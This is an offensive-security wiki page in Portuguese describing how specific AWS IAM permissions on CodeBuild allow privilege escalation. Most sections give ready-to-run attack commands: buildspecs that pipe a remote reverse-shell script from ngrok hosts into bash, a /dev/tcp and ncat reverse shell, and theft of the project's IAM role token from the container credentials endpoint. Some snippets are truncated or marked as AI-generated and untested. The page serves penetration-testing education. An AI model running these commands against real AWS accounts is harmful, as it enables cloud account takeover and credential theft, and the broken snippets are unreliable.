# AWS - Codebuild Privesc {{#include ../../../banners/hacktricks-training.md}} ## codebuild Obtenha mais informações em: {{#ref}} ../aws-services/aws-codebuild-enum.md {{#endref}} ### `codebuild:StartBuild` | `codebuild:StartBuildBatch` Apenas com uma dessas permissões é suficiente para acionar uma construção com um novo buildspec e roubar o token do papel iam atribuído ao projeto: {{#tabs }} {{#tab name="StartBuild" }} ```bash cat > /tmp/buildspec.yml < --buildspec-override file:///tmp/buildspec.yml ``` {{#endtab }} {{#tab name="StartBuildBatch" }} ```bash cat > /tmp/buildspec.yml < --buildspec-override file:///tmp/buildspec.yml ``` {{#endtab }} {{#endtabs }} **Nota**: A diferença entre esses dois comandos é que: - `StartBuild` aciona um único trabalho de construção usando um `buildspec.yml` específico. - `StartBuildBatch` permite que você inicie um lote de construções, com configurações mais complexas (como executar várias construções em paralelo). **Impacto Potencial:** Privesc direto para funções AWS Codebuild anexadas. ### `iam:PassRole`, `codebuild:CreateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`) Um atacante com as permissões **`iam:PassRole`, `codebuild:CreateProject` e `codebuild:StartBuild` ou `codebuild:StartBuildBatch`** seria capaz de **escalar privilégios para qualquer função IAM do codebuild** criando uma em execução. {{#tabs }} {{#tab name="Example1" }} ```bash # Enumerate then env and get creds REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" # Get rev shell REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash" JSON="{ \"name\": \"codebuild-demo-project\", \"source\": { \"type\": \"NO_SOURCE\", \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\" }, \"artifacts\": { \"type\": \"NO_ARTIFACTS\" }, \"environment\": { \"type\": \"LINUX_CONTAINER\", \"image\": \"aws/codebuild/standard:1.0\", \"computeType\": \"BUILD_GENERAL1_SMALL\" }, \"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\" }" REV_PATH="/tmp/rev.json" printf "$JSON" > $REV_PATH # Create project aws codebuild create-project --name codebuild-demo-project --cli-input-json file://$REV_PATH # Build it aws codebuild start-build --project-name codebuild-demo-project # Wait 3-4 mins until it's executed # Then you can access the logs in the console to find the AWS role token in the output # Delete the project aws codebuild delete-project --name codebuild-demo-project ``` {{#endtab }} {{#tab name="Example2" }} ```bash # Generated by AI, not tested # Create a buildspec.yml file with reverse shell command echo 'version: 0.2 phases: build: commands: - curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash' > buildspec.yml # Upload the buildspec to the bucket and give access to everyone aws s3 cp buildspec.yml s3:/buildspec.yml # Create a new CodeBuild project with the buildspec.yml file aws codebuild create-project --name reverse-shell-project --source type=S3,location=/buildspec.yml --artifacts type=NO_ARTIFACTS --environment computeType=BUILD_GENERAL1_SMALL,image=aws/codebuild/standard:5.0,type=LINUX_CONTAINER --service-role --timeout-in-minutes 60 # Start a build with the new project aws codebuild start-build --project-name reverse-shell-project ``` {{#endtab }} {{#endtabs }} **Impacto Potencial:** Privesc direto para qualquer função do AWS Codebuild. > [!WARNING] > Em um **container Codebuild**, o arquivo `/codebuild/output/tmp/env.sh` contém todas as variáveis de ambiente necessárias para acessar as **credenciais de metadados**. > Este arquivo contém a **variável de ambiente `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`** que contém o **caminho da URL** para acessar as credenciais. Será algo como `/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420` > Adicione isso à URL **`http://169.254.170.2/`** e você poderá despejar as credenciais da função. > Além disso, também contém a **variável de ambiente `ECS_CONTAINER_METADATA_URI`** que contém a URL completa para obter **informações de metadados sobre o container**. ### `iam:PassRole`, `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`) Assim como na seção anterior, se em vez de criar um projeto de build você puder modificá-lo, você pode indicar a função IAM e roubar o token. ```bash REV_PATH="/tmp/codebuild_pwn.json" # Enumerate then env and get creds REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" # Get rev shell REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash" # You need to indicate the name of the project you want to modify JSON="{ \"name\": \"\", \"source\": { \"type\": \"NO_SOURCE\", \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\" }, \"artifacts\": { \"type\": \"NO_ARTIFACTS\" }, \"environment\": { \"type\": \"LINUX_CONTAINER\", \"image\": \"aws/codebuild/standard:1.0\", \"computeType\": \"BUILD_GENERAL1_SMALL\" }, \"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\" }" printf "$JSON" > $REV_PATH aws codebuild update-project --cli-input-json file://$REV_PATH aws codebuild start-build --project-name codebuild-demo-project ``` **Impacto Potencial:** Privesc direto para qualquer função do AWS Codebuild. ### `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`) Como na seção anterior, mas **sem a permissão `iam:PassRole`**, você pode abusar dessas permissões para **modificar projetos existentes do Codebuild e acessar a função que já está atribuída a eles**. {{#tabs }} {{#tab name="StartBuild" }} ```sh REV_PATH="/tmp/codebuild_pwn.json" # Enumerate then env and get creds REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" # Get rev shell REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh" JSON="{ \"name\": \"\", \"source\": { \"type\": \"NO_SOURCE\", \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\" }, \"artifacts\": { \"type\": \"NO_ARTIFACTS\" }, \"environment\": { \"type\": \"LINUX_CONTAINER\", \"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\", \"computeType\": \"BUILD_GENERAL1_SMALL\", \"imagePullCredentialsType\": \"CODEBUILD\" } }" # Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild! printf "$JSON" > $REV_PATH aws codebuild update-project --cli-input-json file://$REV_PATH aws codebuild start-build --project-name codebuild-demo-project ``` {{#endtab }} {{#tab name="StartBuildBatch" }} ```sh REV_PATH="/tmp/codebuild_pwn.json" # Get rev shell REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh" # You need to indicate the name of the project you want to modify JSON="{ \"name\": \"project_name\", \"source\": { \"type\": \"NO_SOURCE\", \"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n fast-fail: false\\\\n build-list:\\\\n - identifier: build1\\\\n env:\\\\n variables:\\\\n BUILD_ID: build1\\\\n buildspec: |\\\\n version: 0.2\\\\n env:\\\\n shell: sh\\\\n phases:\\\\n build:\\\\n commands:\\\\n - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n ignore-failure: true\\\\n\" }, \"artifacts\": { \"type\": \"NO_ARTIFACTS\" }, \"environment\": { \"type\": \"LINUX_CONTAINER\", \"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\", \"computeType\": \"BUILD_GENERAL1_SMALL\", \"imagePullCredentialsType\": \"CODEBUILD\" } }" printf "$JSON" > $REV_PATH # Note how it's used a image from AWS public ECR instead from dockerhub as dockerhub rate limits CodeBuild! aws codebuild update-project --cli-input-json file://$REV_PATH aws codebuild start-build-batch --project-name codebuild-demo-project ``` {{#endtab }} {{#endtabs }} **Impacto Potencial:** Privesc direto para funções do AWS Codebuild anexadas. ### SSM Tendo **permissões suficientes para iniciar uma sessão ssm**, é possível **entrar em um projeto Codebuild** que está sendo construído. O projeto codebuild precisará ter um ponto de interrupção:
phases:
pre_build:
commands:
- echo Entrou na fase pre_build...
- echo "Hello World" > /tmp/hello-world
      - codebuild-breakpoint
E então: ```bash aws codebuild batch-get-builds --ids --region --output json aws ssm start-session --target --region ``` Para mais informações [**verifique a documentação**](https://docs.aws.amazon.com/codebuild/latest/userguide/session-manager.html). ### (`codebuild:StartBuild` | `codebuild:StartBuildBatch`), `s3:GetObject`, `s3:PutObject` Um atacante capaz de iniciar/reiniciar uma build de um projeto específico do CodeBuild que armazena seu arquivo `buildspec.yml` em um bucket S3 ao qual o atacante tem acesso de escrita, pode obter execução de comandos no processo do CodeBuild. Nota: a escalada é relevante apenas se o trabalhador do CodeBuild tiver um papel diferente, idealmente mais privilegiado, do que o do atacante. ```bash aws s3 cp s3:///buildspec.yml ./ vim ./buildspec.yml # Add the following lines in the "phases > pre_builds > commands" section # # - apt-get install nmap -y # - ncat -e /bin/sh aws s3 cp ./buildspec.yml s3:///buildspec.yml aws codebuild start-build --project-name # Wait for the reverse shell :) ``` Você pode usar algo como isso **buildspec** para obter um **reverse shell**: ```yaml:buildspec.yml version: 0.2 phases: build: commands: - bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1 ``` **Impacto:** Privesc direto para o papel usado pelo trabalhador do AWS CodeBuild que geralmente tem altos privilégios. > [!WARNING] > Note que o buildspec pode ser esperado em formato zip, então um atacante precisaria baixar, descompactar, modificar o `buildspec.yml` do diretório raiz, compactar novamente e fazer o upload. Mais detalhes podem ser encontrados [aqui](https://www.shielder.com/blog/2023/07/aws-codebuild--s3-privilege-escalation/). **Impacto Potencial:** Privesc direto para os papéis do AWS Codebuild anexados. {{#include ../../../banners/hacktricks-training.md}}